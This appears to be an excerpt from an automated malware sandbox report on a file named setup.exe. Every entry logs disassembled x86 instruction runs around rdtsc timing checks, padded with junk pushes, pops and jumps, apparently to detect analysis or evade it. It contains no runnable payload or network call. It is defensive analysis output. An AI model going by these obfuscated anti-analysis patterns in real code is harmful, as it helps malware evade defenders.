Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5254 second address: EF5259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5259 second address: EF5278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F13EC0 second address: F13ECC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F13ECC second address: F13ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31818 second address: F3181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F3181C second address: F3182E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF32CFB71F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F3182E second address: F31840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31840 second address: F31844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31F56 second address: F31F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320D9 second address: F320F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7203h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320F7 second address: F320FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320FB second address: F32121 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF32CFB7209h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F33F1C second address: F33F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36AFF second address: F36B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36B04 second address: F36B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edx, si 0x0000000f movzx edx, cx 0x00000012 push 00000004h 0x00000014 or dh, 00000018h 0x00000017 pushad 0x00000018 add dword ptr [ebp+124610D8h], ecx 0x0000001e mov edi, 51B18799h 0x00000023 popad 0x00000024 push 1DB18ED8h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36B45 second address: F36B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36E12 second address: F36E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F382E3 second address: F382F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CFB71FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0008 second address: 4DB000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB000C second address: 4DB0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0012 second address: 4DB0046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 call 00007FF32CDD6577h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CDD656Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0046 second address: 4DB0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0055 second address: 4DB005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB005B second address: 4DB005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB005F second address: 4DB0063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0063 second address: 4DB00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7208h 0x00000014 jmp 00007FF32CFB7205h 0x00000019 popfd 0x0000001a call 00007FF32CFB7200h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB00B2 second address: 4DB00FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF32CDD656Dh 0x00000013 pushfd 0x00000014 jmp 00007FF32CDD6570h 0x00000019 and eax, 661CAAA8h 0x0000001f jmp 00007FF32CDD656Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB00FC second address: 4DB0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB7204h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E36 second address: 4D90E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E3A second address: 4D90E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E40 second address: 4D90E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6572h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E56 second address: 4D90E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF32CFB7207h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB7205h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700C3 second address: 4D700C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700C9 second address: 4D700CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700CD second address: 4D70135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CDD6576h 0x00000012 push dword ptr [ebp+04h] 0x00000015 jmp 00007FF32CDD6570h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FF32CDD656Dh 0x00000025 jmp 00007FF32CDD6570h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70182 second address: 4D701A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CFB7207h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D701A8 second address: 4D701C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C24 second address: 4D90C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 pushad 0x00000007 movzx ecx, dx 0x0000000a mov edi, 786A2838h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FF32CFB7201h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov ebx, 470ECAAEh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF32CFB7200h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C69 second address: 4D90C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C6F second address: 4D90C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C73 second address: 4D90C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D907D4 second address: 4D9084B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CFB7200h 0x00000008 sbb cx, A018h 0x0000000d jmp 00007FF32CFB71FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FF32CFB7202h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 jmp 00007FF32CFB71FEh 0x00000026 pushfd 0x00000027 jmp 00007FF32CFB7202h 0x0000002c adc ch, FFFFFFD8h 0x0000002f jmp 00007FF32CFB71FBh 0x00000034 popfd 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D9084B second address: 4D90853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA01E8 second address: 4DA01ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA01ED second address: 4DA0206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6575h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0206 second address: 4DA0296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF32CFB71FEh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007FF32CFB7201h 0x00000018 mov edx, ecx 0x0000001a pop esi 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 jmp 00007FF32CFB71FEh 0x00000028 pushfd 0x00000029 jmp 00007FF32CFB7202h 0x0000002e sub si, 99A8h 0x00000033 jmp 00007FF32CFB71FBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF32CFB7205h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0296 second address: 4DA02B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA02B3 second address: 4DA02B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA02B9 second address: 4DA02BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE001B second address: 4DE0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0021 second address: 4DE0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0025 second address: 4DE0029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0029 second address: 4DE0087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF32CDD6579h 0x00000012 sbb al, 00000036h 0x00000015 jmp 00007FF32CDD6571h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FF32CDD6570h 0x00000021 xor ax, B758h 0x00000026 jmp 00007FF32CDD656Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0087 second address: 4DE008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE008D second address: 4DE00F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF32CDD6573h 0x00000013 add ax, B2CEh 0x00000018 jmp 00007FF32CDD6579h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 mov dx, si 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FF32CDD6576h 0x0000002c pop ebp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov esi, 2371CB53h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0425 second address: 4DB0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CFB7202h 0x00000012 mov eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7207h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0460 second address: 4DB04DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d mov ax, A163h 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FF32CDD656Fh 0x00000018 xor ax, D38Eh 0x0000001d jmp 00007FF32CDD6579h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 jmp 00007FF32CDD6577h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bh, 56h 0x00000034 mov si, 6113h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90642 second address: 4D90651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90651 second address: 4D90657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90657 second address: 4D9065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0E91 second address: 4DA0E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0E97 second address: 4DA0E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB02A1 second address: 4DB02A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0777 second address: 4DD077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD077B second address: 4DD078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD078E second address: 4DD0794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0794 second address: 4DD0798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0798 second address: 4DD07CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7204h 0x00000014 sbb cl, 00000068h 0x00000017 jmp 00007FF32CFB71FBh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD07CA second address: 4DD0800 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FF32CDD6572h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FF32CDD6570h 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0800 second address: 4DD0804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0804 second address: 4DD0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0808 second address: 4DD080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD080E second address: 4DD0870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 74h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6577h 0x0000000b or ecx, 12DC386Eh 0x00000011 jmp 00007FF32CDD6579h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FF32CDD6571h 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF32CDD656Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0870 second address: 4DD0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, edi 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0893 second address: 4DD08F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push esi 0x0000000d mov dl, 54h 0x0000000f pop ecx 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD656Fh 0x00000016 xor ch, FFFFFFEEh 0x00000019 jmp 00007FF32CDD6579h 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007FF39F3B95F0h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF32CDD656Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD08F1 second address: 4DD0919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d jmp 00007FF32CFB7202h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0919 second address: 4DD091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD091D second address: 4DD0937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0937 second address: 4DD0967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF32CDD6576h 0x00000011 ror eax, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0967 second address: 4DD096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD096B second address: 4DD0971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0971 second address: 4DD09D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 mov edi, 55AB2E82h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e jmp 00007FF32CFB7209h 0x00000013 retn 0004h 0x00000016 nop 0x00000017 mov esi, eax 0x00000019 lea eax, dword ptr [ebp-08h] 0x0000001c xor esi, dword ptr [00C82014h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 lea eax, dword ptr [ebp-10h] 0x00000028 push eax 0x00000029 call 00007FF331147BA1h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FF32CFB7203h 0x00000039 add ch, FFFFFFDEh 0x0000003c jmp 00007FF32CFB7209h 0x00000041 popfd 0x00000042 mov eax, 47CE25A7h 0x00000047 popad 0x00000048 rdtsc
